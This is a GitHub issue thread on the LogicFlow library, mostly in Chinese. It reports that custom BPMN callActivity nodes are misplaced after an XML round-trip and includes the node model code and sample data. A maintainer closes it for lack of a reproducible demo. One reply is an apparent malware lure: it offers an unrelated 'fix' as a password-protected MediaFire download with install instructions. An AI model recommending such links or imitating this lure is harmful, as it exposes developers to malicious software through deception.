### ISSUE TITLE
[Bug Report]: 自定义节点转xml后再转回来回显节点位置有偏移

### ISSUE THREAD

**Issue by jisuwoniusxy** [didi/LogicFlow#1829]
### 发生了什么？

自定义节点转xml后再转回来回显节点位置有偏移,  从操作台拖拽出来和直接写数据出来的都是正常的就是转换后再转回来就有偏移
最新版,以前的版本没试
![微信截图_20240828142957](https://github.com/user-attachments/assets/ecc39df0-1d5f-43a7-9932-36379652f87a)

### logicflow/core版本

2.0.3

### logicflow/extension版本

2.0.5

### 浏览器&环境

Chrome, NodeJS

**Comment by jisuwoniusxy** [comment]
自定义节点类型代码:
class CustomRectModel extends RectNodeModel {
  getNodeStyle() {
    const style = super.getNodeStyle();
    const properties = this.properties;
    properties.calledElement='';// 业务属性calledElement(子流程指向的流程id)
    return style;
  }
}
class CustomRectNode extends RectNode {}
// 自定义节点
const useNodeStyle={
  type: 'bpmn:callActivity',
  // id: 'Activity_'+randomString(10),
  view: CustomRectNode,
  model: CustomRectModel,
}


// 自定义节点数据
let logicFlow_data = {
  nodes: [
    {
      // id: '3',
      type: 'bpmn:callActivity',
      x: 300,
      y: 200,
      text: 'callActivity',
      properties: {
        statu: 'callActivity',
      },
    },
  ],
}

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by boyongjiong** [comment]
目前提供的信息无法定位问题，最好带着复现 Demo 重新提 issue。先关闭此 issue
